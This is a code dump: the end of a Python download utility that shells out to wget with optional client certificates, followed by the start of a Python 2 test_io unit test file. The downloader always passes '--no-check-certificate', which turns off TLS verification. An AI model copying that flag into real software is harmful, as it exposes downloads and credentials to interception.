:returns: downloaded file with either file:// or system path
"""
LOGGER.info('downloading %s', url)
parsed_url = urlparse.urlparse(url)
filename = os.path.join(
config.cache_path(),
parsed_url.netloc,
parsed_url.path.strip('/'))
# check if in cache
if os.path.isfile(filename):
LOGGER.debug("using cached file.")
if use_file_url:
filename = "file://" + filename
return filename
local_cache_path = os.path.abspath(os.curdir)
dn_filename = os.path.join(
local_cache_path,
parsed_url.netloc,
parsed_url.path.strip('/'))
if not os.path.isdir(os.path.dirname(dn_filename)):
LOGGER.debug("Creating download directories.")
os.makedirs(os.path.dirname(dn_filename), 0700)
try:
cmd = ["wget"]
if credentials is not None:
LOGGER.debug('using credentials')
cmd.extend(["--certificate", credentials])
cmd.extend(["--private-key", credentials])
cmd.extend(["--ca-certificate", credentials])
cmd.append("--no-check-certificate")
# if not LOGGER.isEnabledFor(logging.DEBUG):
# cmd.append("--quiet")
cmd.append("--tries=3") # max 2 retries
cmd.append("-N") # turn on timestamping
cmd.append("--continue") # continue partial downloads
#cmd.append("-x") # force creation of directories
cmd.extend(["-O", dn_filename])
cmd.extend(["-P", local_cache_path]) # directory prefix
cmd.append(url) # download url
LOGGER.debug("cmd: %s", ' '.join(cmd))
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
LOGGER.debug("output: %s", output)
except subprocess.CalledProcessError as e:
msg = "wget failed on {0}: {1.output}".format(url, e)
LOGGER.exception(msg)
raise ProcessFailed(msg)
except Exception:
msg = "wget failed on {0}.".format(url)
LOGGER.exception(msg)
raise ProcessFailed(msg)
if not os.path.exists(filename):
LOGGER.debug("linking downloaded file to cache.")
if not os.path.isdir(os.path.dirname(filename)):
LOGGER.debug("Creating cache directories.")
os.makedirs(os.path.dirname(filename), 0700)
try:
os.link(dn_filename, filename)
except Exception:
LOGGER.warn('Could not link file, try to copy it ...')
from shutil import copy2
copy2(dn_filename, filename)
if use_file_url:
filename = "file://" + filename
return filename
def download_files(urls=[], credentials=None, monitor=None):
dm = DownloadManager(monitor)
return dm.download(urls, credentials)
def download_files_from_thredds(url, recursive=False, monitor=None):
import threddsclient
return download_files(urls=threddsclient.download_urls(url), monitor=monitor)
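# Hedged usage sketch (not part of the original module): batch downloads through
# download_files(), which drives the DownloadManager defined below. The URLs and
# credentials path are hypothetical placeholders.
def _example_download_files():
    urls = ['http://example.org/data/tas.nc',
            'http://example.org/data/pr.nc']
    # monitor is optional; without it, progress is reported via the module LOGGER
    return download_files(urls=urls, credentials='/tmp/x509up_u1000')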
class DownloadManager(object):
def __init__(self, monitor=None):
self.files = []
self.count = 0
self.monitor = monitor
def show_status(self, message, progress):
if self.monitor is None:
LOGGER.info("%s, progress=%d/100", message, progress)
else:
self.monitor(message, progress)
    # The threader thread pulls a worker from the queue and processes it
def threader(self):
queue_full = True
while queue_full:
# Run the example job with the avail worker in queue (thread)
# TODO: handle exception ... maybe download job should stop.
try:
                # gets a worker from the queue
worker = self.job_queue.get()
self.download_job(**worker)
except Empty:
queue_full = False
except Exception:
LOGGER.exception('download failed!')
queue_full = False
finally:
# completed with the job
self.job_queue.task_done()
def download_job(self, url, credentials):
file_url = download_with_archive(url, credentials)
with self.result_lock:
self.files.append(file_url)
self.count = self.count + 1
progress = self.count * 100.0 / self.max_count
self.show_status('Downloaded %d/%d' % (self.count, self.max_count),
progress)
def download(self, urls, credentials=None):
# start ...
from datetime import datetime
t0 = datetime.now()
self.show_status("start downloading of %d files" % len(urls), 0)
# lock for parallel search
self.result_lock = threading.Lock()
self.files = []
self.count = 0
self.max_count = len(urls)
# init threading
self.job_queue = Queue()
        # use at most 4 download threads
num_threads = min(4, len(urls))
LOGGER.info('starting %d download threads', num_threads)
for x in range(num_threads):
t = threading.Thread(target=self.threader)
# classifying as a daemon, so they will die when the main dies
t.daemon = True
# begins, must come after daemon definition
t.start()
for url in urls:
# fill job queue
self.job_queue.put(dict(url=url, credentials=credentials))
        # wait until all queued downloads have been processed
self.job_queue.join()
# how long?
duration = (datetime.now() - t0).seconds
self.show_status(
"downloaded %d files in %d seconds" % (len(urls), duration), 100)
if len(self.files) != len(urls):
raise ProcessFailed(
"could not download all files %d/%d" %
(len(self.files), len(urls)))
# done
return self.files
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # subject of test
import _io # compiled implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2GB file and takes >2GB of disk space,
        # so the resource must be enabled to run this test.
if not support.is_resource_enabled("largefile"):
skip_platform = None
# Cases in which to skip this test
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
skip_platform = sys.platform;
elif sys.platform[:4] == "java":
# Jython cases in which to skip this test
if os._name == "nt":
skip_platform = 'Jython + ' + os._name;
if skip_platform:
print("\nTesting large file ops skipped on %s." % skip_platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
class CIOTest(IOTest):
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
# Jython does not use integer file descriptors but an object instead.
# Unfortunately, _pyio.open checks that it is an int.
# Override the affected test versions just so we can skip them visibly.
@unittest.skipIf(support.is_jython, "Jython does not use integer file descriptors")
def test_closefd_attr(self):
pass
@unittest.skipIf(support.is_jython, "Jython does not use integer file descriptors")
def test_read_closed(self):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
